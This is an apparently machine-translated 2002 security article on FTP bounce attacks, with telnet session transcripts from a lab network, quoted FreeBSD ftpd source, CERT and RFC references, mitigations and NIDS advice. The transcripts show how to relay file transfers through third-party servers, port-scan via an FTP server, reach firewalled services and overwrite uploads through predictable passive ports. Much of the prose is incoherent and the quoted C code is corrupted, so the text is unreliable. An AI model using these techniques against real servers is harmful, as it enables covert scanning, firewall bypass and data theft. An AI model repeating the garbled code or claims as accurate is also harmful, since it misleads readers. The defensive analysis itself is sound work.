Release Date: 2002-09-17
Article content:
Author: scz
Home:
http://www.nsfocus.com
Date: 2002-01-20
table of Contents:
1 Introduction
2. A visual FTP Bounce attack example
3. About the discussion of the port involved in the above example
4. SPARC / Solaris 7 defaults to the problem with FTP Server
5. x86 / freebsd 4.3-release problem with FTP Server, which is default
6. Implementation of FTP Server in X86 / FreeBSD 4.X
7. CERT response to this problem
8. Related RFC
9. The harm of FTP Bounce attack
1) Port scan
2) Breakthrough in conventional firewall
3) Download sensitive information from the restriction source IP site
4) Combine Dynamic Firewall with Java Applet
10. Solution
11. X86 / freebsd 4.x in the port after the FTP Server enters the PASV mode
12. Possibility of FTP Hijacking
13. Use of proxy command
14. NIDS react to this problem
15. Postscript
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
★ 1. Preface
This article is mainly to accumulate, summarize, and reviewed the FTP Bounce attack. If you are already familiar with this,
Please criticize and ax.
★ 2. An an intuitive FTP Bounce attack example
100Mbps switch ----- ----- 192.168.5.203 (x86 / linux)
|
--- 192.168.5.201 (x86 / freebsd 4.3-release)
|
--- 192.168.5.209 (SPARC / Solaris 7)
Suppose 192.168.5.201 and 192.168.5.209 are default installation, and open FTP Server
Do as follows on 192.168.5.203
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Telnet 192.168.5.201 21
User scz <- User Name
Pass *** <- password
CWD SRC <- Switch to a corresponding user writable directory (can upload directory / home / SCZ / SRC)
TYPE I <- Switch Transfer Mode
PASV <- Server enters passive mode, waiting for TCP connection from Client
227 Entering Passive Mode (192, 168, 5, 201, 193, 3)
^^^^^^^^^^^^^^^^^^^^^^^^^
STOR OUT <- Specifies the file name used when saving data in the future
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Most FTP Server I have contacted is not sensitive to the command keyword (such as user, user).
How to check how RFC 959 is defined. At this time, this is blocked and does not move this window.
Suppose / Export / Home / SCZ / SRC / in file on 192.168.5.209
Open another window on 192.168.5.203, do the following
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Telnet 192.168.5.209 21
User scz <- User Name
Pass *** <- Password CWD SRC <- Switch to / Export / Home / SCZ / SRC
TYPE I <- Switch Transfer Mode to Binary Mode
Port 192, 168, 5, 201, 193, 3
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Retrin
quit
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Back to STOR OUT window input
quit
At this point, there is / home / SCZ / SRC / OUT file on 192.168.5.201, from 192.168.5.209 / Expo-
RT / HOME / SCZ / SRC / IN file. The data flows between 192.168.5.201 and 192.168.5.209, but control
It is initiated completely from 192.168.5.203, which is an intuitive explanation of FTP Bounce attack.
From the test process, you can see that SPARC / Solaris 7 defaults of FTP Server is also easy to suffer from FTP BOUNCE.
Attack, but it makes a limit for the port command, not allowing a privileged port of less than 1024.
The affected PI-Soft SpoonFTP version does not limit the port command, not only can specify non-Client IP,
You can also specify a privileged port of less than 1024.
★ 3. About the discussion of the port involved in the above example
100Mbps switch ----- ----- 192.168.5.203 (x86 / linux)
|
--- 192.168.5.201 (x86 / freebsd 4.3-release)
|
--- 192.168.5.209 (SPARC / Solaris 7)
1) 192.168.5.203 -> 192.168.5.201 TCP / 21
192.168.5.203 TCP / 21 to connect 192.168.5.201, establish the first FTP control flow,
After User, Pass, CWD, TYPE, the last is the PASV command, refers to the 192.168.5.201 in TCP / 49411
Enter the Listen state, wait for the connection request.
193 * 256 3 = 49411
As can be seen from the test process, 192.168.5.201 (x86 / freebsd 4.3-release) FTP Server enters
After passive mode, the CLIENT IP of the data stream is not checked, and the data should be restricted from the security perspective.
The stream of Client IP must be consistent with the CLIENT IP of the control stream.
After the Stor command is issued, the FTP Server on 192.168.5.201 enters the blocking state, waiting for the data stream TCP connection.
2) 192.168.5.203 -> 192.168.5.209 TCP / 21
192.168.5.203 Call the connect () connection 192.168.5.209 TCP / 21, establish a second FTP control flow,
After User, Pass, CWD, Type, then the port command, notify 192.168.5.209 under FTP Server
The target stream Connect () is 192.168.5.201 TCP / 49411 port.
3) 192.168.5.209 TCP / 20 -> 192.168.5.201 TCP / 49411
After the RETR IN command to 192.168.5.209, 192.168.5.209 will call connect ()
Connect the TCP / 49411 port of 192.168.5.201, and send this TCP connection to this TCP connection
go with.
At this time, the connection () call will call the bind () call before calling, specifying the native port of 20. In order to confirm this, you can use TCPDUMP to capture, executed on 192.168.5.201
# / usr / sbin / tcpdump -i fxp0 -nets -s 96 -c 3000 TCP AND SRC Port 20 and src Host 192.168.5.209
Specify the interface, cancel the reverse domain name resolution, display the MAC address, display the timestamp, display absolute TCP serial number,
Snaplen is 96, caught 3000 packets, TCP packets, source port 20, and source IP is 192.168.5.209.
★ 4. SPARC / Solaris 7 There is a problem with FTP Server, which is default.
The FTP Server used by the SPARC / Solaris 7 used in my test has not been configured, there is no 2.6 for the time being.
The test environment, does not confirm that SPARC / Solaris 2.6 default, the FTP Server, which is not configured, is
No, there is a problem, but I believe it exists. This FTP Server is implemented on the implementation of the port command.
1) No restrictions specified IP can only be a CLIENT IP on the control flow
However, this FTP Server
2) Limit the specified port must be a non-privileged port greater than or equal to 1024
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Telnet 192.168.5.209 21
User SCZ
Pass ***
Port 192, 168, 5, 201, 0, 23
500 Port Argument Must Be 1024 or Greater.
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
★ 5. x86 / freebsd 4.3-release the problem that the defaults of FTP Server exists
This FTP Server is implemented on the implementation of the PASV command.
1) No restrictions only allow for the CLIENT IP initiating data stream TCP connection request from the control flow
This FTP Server is implemented on the implementation of the port command.
2) The specified IP can only be a CLIENT IP on the control flow.
3) The specified Port must be a non-privileged port greater than or equal to 1024
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Telnet 192.168.5.201 21
User SCZ
Pass ***
Port 192, 168, 5, 209, 0, 23
500 Illegal Port Range Rejected.
Port 192, 168, 5, 203, 0, 23
500 Illegal Port Range Rejected.
Port 192, 168, 5, 203, 23, 23
200 Port Command Successful.
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
★ 6. Implementation of FTP Server in X86 / FreeBSD 4.X
Backend
There is a port_check () function. The implementation of the USR / libexec / ftpd uses YACC tools.
-------------------------------------------------- ------------------------ / *
* Return 1, if port check is done. Return 0, if not yet.
* /
Static Int port_check (const char * pcmd)
{
IF (his_addr.su_family == AF_INET)
{
IF (Data_Dest.su_Family! = AF_INET)
{
USDEFAULT = 1;
Reply (500, "Invalid Address Rejected.");
Return (1);
}
/ *
* Note that here, two important judgments
* /
IF (Paranoid && ((NTOHS (Data_Dest.su_Port) || Memcmp (& Data_Dest.su_sin.sin_addr, & his_addr.su_sin.sin_addr, SIZEOF (Data_Dest.su_sin.sin_addr))))))))))))))) { USDEFAULT = 1; Reply (500, "Illegal Port Range Rejected."); } Else { USDEFAULT = 0; IF (PDATA> = 0) { (void) Close (PDATA); PDATA = -1; } Reply (200, "% s Command Successful.", PCMD); } Return (1); } Return (0); } / * End of port_check * / -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Obviously, this FTP Server has made important limitations in the implementation of the port command. 1) The specified IP can only be a CLIENT IP on the control flow. 2) The specified Port must be a non-privileged port greater than or equal to 1024 Any condition is not met, "ILLEGAL Port Range Rejected." For passive mode of FTP Server, Man -s 8 ftpd, you can see the following -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- -U old version of FTPD After entering the PASV mode, the port used by the data stream is [1024, 4999]. The current version, the default, this range is [49152, 65535]. If the specified -u parameter starts the FTPD, the old version of the port range will be used. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- ★ 7. CERT response to this problem 1997.12.10, CERT issued an announcement on this issue http://www.cert.org/advisories/ca-1997-27.html 1999.03.08 did the last correction. Confelted to FTP Bounce http://www.cert.org/tech_tips/ftp_port_attacks.html ★ 8. Related RFC RFC 959 is the original FTP protocol, which does not make any restrictions on the implementation of the port command. Can you specify a small The privileged port of 1024 is not described in RFC 959. It is clearly indicated in Section 3.2 to transmit data between two FTPServer, and controls from third parties. In other words, the so-called FTP Bounce attack is compatible with RFC, which is very ironic. Things, it is also a serious security issue for the FTP protocol. Another serious security issue of the FTP protocol is the username and The password is explicitly transmitted, it is easy to be listened. RFC 1579 is "FireWall-Friendly FTP", which makes recommendations for FTP Client, and does not require Modify FTP Protocol. RFC 959 This suggests that "server active mode" under the target port of Connect () is the source port of the control flow. But absolutely Most FTP Client did not adopt this suggestion, in order to avoid the trouble brought by Time_Wait status, they are A new port is listen () and notifies the FTP Server via the port command. This gives FireWall configuration Come on disaster. ★ 9. The harm of FTP Bounce attack 1) Port scan Attackers can assume the port scan of the Connect () formula by the FTP Server, and finally scanned objects. See the connection from the FTP Server, not the original attacker's IP. For example, TCP / 3306 on 192.168.5.201 is open, doing the following operations in 192.168.5.203 -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Telnet 192.168.5.209 21 User SCZ Pass *** Port 192, 168, 5, 201, 23, 23 200 Port Command Successful. NLST 425 CAN't Build Data Connection: Connection Refused. Port 192, 168, 5, 201, 12, 234 200 Port Command Successful. NLST 150 ASCII Data Connection for / Bin / LS (192.168.5.201, 3306) (0 bytes). 226 ASCII Transfer Complete. quit -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- As the above information indicates that TCP / 3306 of 192.168.5.201 is on Connect (), while TCP / 5911 is not open. At this time, 192.168.5.201 was only known from 192.168.5.209, without knowing the attacker located in 192.168.5.203. Obviously this will endanger permission control, such as IP restrictions. 2) Breakthrough in conventional firewall Assumptions 192.168.5.209 and 192.168.5.201 are located within the firewall, and 192.168.5.203 is located in the firewall In addition, only directly access 192.168.5.209.192.168.5.201 provides WWW CGI service on TCP / 8080 port From 192.168.5.203 Unable to use these CGI services directly, from 192.168.5.209 can be used directly Some CGI services. Through 192.168.5.209, you can do a springboard host, 192.168.5.203 can upload an appropriate HTTP protocol first Data file to 192.168.5.209, then use the FTP Bounce attack to send the contents of the data file to 192.168.5.201 TCP / 8080 port. This brings hidden dangers to intranet security. 3) Download sensitive information from the restriction source IP site For example, some sensitive information on 192.168.5.209 is not open to 192.168.5.203 due to national policy reasons, only some of the directories are world public. And 192.168.5.201 itself It is complete world public. If 192.168.5.209 is vulnerable to the FTP Bounce attack, and 192.168.5.201 can enter the PASV mode, then To use this to pass the sensitive information from 192.168.5.209 to 192.168.5.201, then take it back. In 1995, this issue is pointed out by hobbit on Bugtraq Maillist. See Http://cui.unige.ch/eao/www/techinternet/ftp-attack.html This article is very brilliant, but I don't have to use FTP Client, directly Telnet I.e. A little discussion A. The author uses the standard FTP Client, so use the quote command, this is not an FTP Server command, but The ftp client command indicates that the original data is sent. b. The author constructs such a file -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- User FTP Pass -anonymous @ CWD / EXPORT-RESTRICTED-CRYPTO Type I Port f, f, f, x, x Retr crypto.tar.z quit @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ... ^ @ ^ @ ^ @ ^ @ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ... ^ @ ^ @ ^ @ ^ @ ... -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- If you directly control it with Telnet, you can not urgently enter quit after retri, so there is no control. The problem ended in advance, so subsequent ^ @ (already / 0) is not there. C. The authors have used a skill -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- PUT INSTRS Quote "Port C, C, C, C, 0, 21" Quote "Retrial INSTRS" -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- The port command indicates the next Connect () target, and now the control stream is known for TCP / 21. RETR command The book INSTRS file will be read and the contents are sent through the TCP connection. It is equivalent to The control command is input on the control flow. If you don't need to see the "blind" attack of the echo data, do the port with the existence of FTP Server It is a meaningful thing to forward submit input. Consider those IDs, firewall, acls, log, and so on. SCZ Note: There are some practical problems in this technique, noting 21 <1024, for The default FTP Server settings for X86 / FreeBSD 4.3-Release and SPARC / Solaris 7, no The method specifies such a port through the port command, which will not take advantage of this trick. Control directly Telnet Wire utilization. 4) Combine Dynamic Firewall with Java Applet Suppose VICTIM is located in the firewall, and accesses the web page made by Attacker outside the firewall. Brought a Java Applet. This Java Applet will connect () back to Attacker's TCP / 21 mouth, this There is no violation of the "SAND BOX" principle. Java Applet sent back is the ftp port command, so that Attacker is trying to connect () to Victim. An intranet protected host. Dynamic Pack Filter firewall checks Outbound packets to determine the next filtering mechanism. It notes in Port Command, allowing Attacker to connect the host of the intranet, and usually this connection is not allowed for the firewall. Xu. Martin, David M., Rajagopalan, Sivaramakrishnan, And Rubin, Aviel D., Write a "Blocking Java Applets at the FireWall" in 1997, special discussion Question, see http://avirubin.com/block.java.pdf From here again, you can see that ftp protocol is implemented to FireWall, Proxy, and the configuration. ★ 10. Solution Because the so-called "FTP Bounce" attack is the norm of RFC 959, it is more difficult to solve this problem. Now In many vendors allow customization of the response to FTP Server, there are some solutions 1) FTP Server strictly follows the RFC 959, and the port command does not do any restrictions, and turn to other network services. The program, the reject source port is a connection request for TCP / 20. 2) Limit the port command, can only specify the CLIENT IP on the control flow 3) Two implementations for the port command, one of which is the default setting, can be switched between the two. At this time What is the provision of provincial settings? 4) Limit the write permissions of anonymous FTP account to help reduce the meaning of FTP Bounce attack, but cannot prevent port scanning. 5) Carefully choose FireWall and carefully configure it, like this kind of mentally handicapped Java Applet attack The firewall reaction should be discarded. Note that in order to solve this problem, it is likely to violate RFC 959. ★ 11. X86 / freebsd 4.x in the port after the FTP Server enters the PASV mode Gossomized looking at src / libexec / ftpd / ftpd.c, FTP Server entered the PASV mode did not have source IP Do too much restrictions. Define the following functions () in the file src / libexec / ftpd / ftpd.c. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Void passive () { Int Len; Char * p, * a; / * * Close Old Port if One Set * / IF (PDATA> = 0) { Close (PDATA); } PDATA = Socket (Ctrl_addr.su_Family, Sock_Stream, 0); IF (PDATA <0) { PERROR_REPLY (425, "Can't Open Passive Connection); Return; } (void) STEUID ((UID_T) 0); #ifdef ip_portrange IF (ctrl_addr.su_family == AF_INET) { / * * Case 'u': * Restricted_data_ports = 0; * Break; * / INT ON = restricted_data_ports? ip_portrange_highh : Ip_portrange_default; IF (setsockopt (pdata, ipproto_ip, ip_portrange, (char *) & on, sizeof (on)) <0) { Goto Pasv_ERROR; } } #ENDIF PASV_ADDR = Ctrl_Addr; / * * Note * / PASV_ADDR.SU_PORT = 0; IF (bind (struct socmedr *) & pasv_addr, pasv_addr.su_len) <0) { Goto Pasv_ERROR; } (void) SeteUID ((UID_T) PW-> PW_UID); LEN = SizeOf (PASV_ADDR); IF (GetSockName (PDATA, (Struct Sockaddr *) & Pasv_addr, & Len) <0) { Goto Pasv_ERROR; } / * * Note that the second number of listen () is 1, not a common 5, can only handle this Socket separately * Connection request * / IF (Listen (PDATA, 1) <0) { Goto Pasv_ERROR; } IF (PASV_ADDR.SU_FAMILY == AF_INET) { A = (char *) & PASV_ADDR.SU_SIN.SIN_ADDR; } Else IF (PASV_ADDR.SU_FAMILY == AF_INET6 && IN6_IS_ADDR_V4MAPPED (& PASV_ADDR.SU_SIN6.SIN6_ADDR))) { A = (char *) & PASV_ADDR.SU_SIN6.SIN6_ADDR.S6_ADDR [12]; } Else { Goto Pasv_ERROR; } P = (char *) & PASV_ADDR.SU_PORT; #define uc (b) ((int) b) & 0xFF) Reply (227, "Entering Passive Mode (% D,% D,% D,% D,% D,% D)", UC (a [0]), UC (a [1]), UC (a [2]), uc (a [3]), uc (p [0]), UC (P [1])); Return; PASV_ERROR: (void) SeteUID ((UID_T) PW-> PW_UID); (void) Close (PDATA); PDATA = -1; PERROR_REPLY (425, "Can't Open Passive Connection); Return; } / * End of passive * / -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Backe has completed this function as follows -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- 1) See /usr/include/netinet/in.h file / * * Argument for ip_portrange: * - Which Range to search at bind () or connect () * / #define ip_portrange_default 0 / * Default Range * / #define ip_portrange_high 1 / * "High" - Request FireWall Bypass * / #define ip_portrange_low 2 / * "limited" - VOUCHSAFE Security * / / * * Ports * Privileged processes (E.G. root). (ip_portrange_low) * Ports> ipport_userreserved is reserved * for servers, not necessarily privileged. (ip_portrange_default) * / #define ipport_reserved 1024 #define ipport_userreserved 5000 / * * DEFAULT LOCAL Port Range to use by setting ip_portrange_highh * / #define ipport_hifirstauto 49152 #define ipport_hilastauto 65535 / * * Scanning for a free reserved port return A value bellow ipport_reserved, * But Higher Than ipport_reservedstart. Traditional the start value WAS * 512, But That Conflicts with Some Well-KNown-Services That FireWalls May * Have A Fit IF We Use. * / #define ipport_reservedStart 600 2) Perform the following operations to view the relevant adjustable kernel parameters # sysctl -a | grep net.inet.ip.portRange Net.inet.ip.portRange.lowfirst: 1023 <- It is too strange here, actually 1023 in front Net.inet.ip.portRange.lowLast: 600 Net.inet.ip.portRange.First: 1024 Net.inet.ip.portRange.last: 5000 Net.inet.ip.portRange.hiFirst: 49152 <- adjustable, but not less than 1024 Net.inet.ip.portRange.hilast: 65535 # 3) Do the following test on a X86 / FreeBSD 4.3-Release # sysctl -w net.inet.ip.portrange.hiFirst = 1024 # sysctl -w Net.inet.ip.portRange.hilast = 1024 # Telnet Localhost 21 User backend Pass ******** PASV 227 Entering Passive Mode (127, 0, 0, 1, 4, 0) ^] Telnet> Q # sysctl -w net.inet.ip.portrange.hiFirst = 49152 # sysctl -w Net.inet.ip.portRange.hilast = 65535 4) MAN -S 8 ftpd -R If this option is set, the ftpd will not be safe inspections to the port command, and ftpd in history is this. of. The current version of FTPD defaults to securely check the port command, can only specify the Client IP and large The non-privileged port of 1023. This is contrary to RFC 959, but prevents certain security vulnerabilities. You can modify the setting of FTPD in /etc/inetd.conf, Kill -Hup # Telnet Localhost 21 User backend Pass ******** Port 192, 168, 5, 8, 0, 23 <- 192.168.5.8 Non-localhost, 23 is the privileged port 200 Port Command Successful. ^] Telnet> Q # -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Pay attention to here PASV_ADDR.SU_PORT = 0; FTP Server left the task of the selection port to the operating system and does not maintain this port value. But in me During the test, this port is found to be incremented in order, which means that this port value is predictable. This constitutes potential security issues, because third parties can connect this port and send any data to it, eventually Store this unit file according to the specified specification of the stor command. Stor command starts ACCEPT (). Because it is Listen (PDATA, 1), the second ginseng is 1, and only an accept () is close (), So this port has only one opportunity. For the FTP Client for GUI, there is almost no chance to give third parties. But the problem is potentially present. The ftp server enters the PASV mode in SPARC / Solaris 7 exists the same problem. There is the following directory cmd / cmd_inet / usr_sbin / in_ftpd / usr_sbin / in_ftpd /, under the source package of Solaris 7. Similar ftpcmd.y and ftpd.c files, roughly look, with FreeBSD, Datong, after all, Sun OS 4.x is on BSD branch. 1) Execute the following operations from 192.168.5.203 -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Telnet 192.168.5.209 21 User SCZ Pass *** CWD SRC Type I PASV 227 Entering Passive Mode (192, 168, 5, 209, 130, 253) STOR Hello ~~~~~~~~~~~~~~~~~~~~ It forms blockage here, don't rush to enter the quit command 150 binary Data Connection for Hello (192.168.5.201, 1032). 226 Transfer Complete. quit 221 Goodbye. Connection Closed by Foreign Host. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- 2) Perform the following operations from 192.168.5.201 -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Telnet 192.168.5.209 33533 World ^ D ^] Telnet> Q Connection closed. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- 3) You can now check the / export / home / scz / src / hello file on 192.168.5.209 -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- [SCZ @ / export / home / scz / src]> CAT Hello World [SCZ @ / export / home / scz / src]> od -a x -t x1 Hello 0000000 77 6F 72 6C 64 0D 0A 04 0D 0A 000000A [SCZ @ / export / home / scz / src]> -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Note that 192.168.5.209 has entered passive mode due to FTP request from 192.168.5.203, but it handles Data flow from 192.168.5.201. There is no authentication here, which is used by the control flow. ★ 12. The possibility of ftp hijacking Although these operations are more unreal, combined with "TCP Hijacking", "IP Spoof", etc. Technology, this security issue has become very valuable. I didn't have a "ftp hijacking" in the past. Is software (Faint, I gathered to the disc stack, who is there, send it to a copy, THX). In fact, in the FTP Bounce attack, only one ftp server is required, and the previous example will be used. The FTP Server is just a ready-made, you can do Socket programming yourself. Note that the authentication made by FTP Server occurs only during the user / pass process, and the later port, PASV, RETR, STOR and other commands have not done any authentication, directly using the user privileges with the control flow. Let us see what can do after the legitimate user is successful. 1) Combine TCP Hijacking, IP Spoof In the control flow forgery, there is no need to consider the identity Certificate 2) Third party forgery port, retri command to illegally download data 3) Third party forgery PASV, Stor command to illegally upload data 4) The third party predicts the PASV port, which can be covered directly through the data stream. Attention, 4) No need to TCP Hijacking, consider SNIFFER technology, then use the program cycle predict the PASV port, once connect () successs (can not do SYN half open scan, the previous explanation, only one chance), immediately upload Data is covered. If the user legally logged in is root,! · # ¥% ... - * It is again confirmed that there is too many security hazards for ROOT to do remote FTP Server logins. ★ 13. Use of proxy command In x86 / linux, Man FTP can be seen -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Proxy ftp-command This command allows two FTP control flows to two FTP Server and transmits between them. file Proxy Get Represents the role of the second FTP Server playing Client, downloads from the first FTP Server file Proxy Put indicates the role of the second FTP Server plays a client, uploading the first FTP Server file In order to use this command normally, ask the second FTP Server to support the PASV command. SCZ Note: The first FTP Server is actually required to fully implement RFC 959, and do not limit the port command. That is, the proxy command is only when the first FTP Server is easily attacked by the FTP Bounce. Can successfully execute it. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Ok, let us now look at the actual example, execute the following operations on 192.168.5.203 -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- FTP 192.168.5.209 SCZ <- Enter the username on 192.168.5.209 *** <- Enter the password on 192.168.5.209 Binary <- Switches the transmission mode on 192.168.5.209 CD SRC <- Switches the directory on 192.168.5.209 Debug <- Open the debug mode, observe the original command Proxy open 192.168.5.201 SCZ <- Enter the username on 192.168.5.201 *** <- Enter the password on 192.168.5.201 Proxy binary <- Switch the transmission mode on 192.168.5.201 Proxy CD SRC <- Switches the directory on 192.168.5.201 Proxy Get in Out <- 192.168.5.201 Download in 192.168.5.209 Download IN, with local OUT Proxy Close <- Close to 192.168.5.201 control flow BYE <- Turns to 192.168.5.209 control flow -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Since the Debug mode is opened, you can see -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- FTP> Proxy Get in Out ---> PASV 192.168.5.201:227 Entering Passive Mode (192, 168, 5, 201, 193, 42) ---> Port 192, 168, 5, 201, 193, 42 ---> Retrin 192.168.5.209:150 Binary Data Connection for In (192.168.5.201, 49450) ---> STOR OUT -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Now I have a thorough understanding of the proxy command, no longer feel mysterious, huh. Note that proxy is The ftp client command keyword, not the ftp server command keyword, and finally disassembled into PASV, STOR, Port, retrin these commands. ★ 14. NIDS response to this problem Network IDS If you do content filtering, you can parse, check the port command in the FTP control stream. 1) Whether the specified IP is in line with the source IP of the control flow itself 2) Whether the designated port is greater than or equal to 1024 If you violate one, there are two possibilities 1) FTP Client is operated in normal proxy commands. This requirement is not common. 2) The attacker is assaulting the FTP Bounce attack. This may be relatively large. NIDS configuration staff can determine whether the NIDS is alarm according to the actual topology in the LAN. ★ 15. Postscript The FTP Protocol defined by RFC 959 has many security issues, and this article is only discussed. This There is no more test procedures, there is a chance to add this document, such as "ftp hijacking" That part, there is also a "port scan" program implementation, and more. Welcome to criticize this article, ax being. Thank Backend Finished>
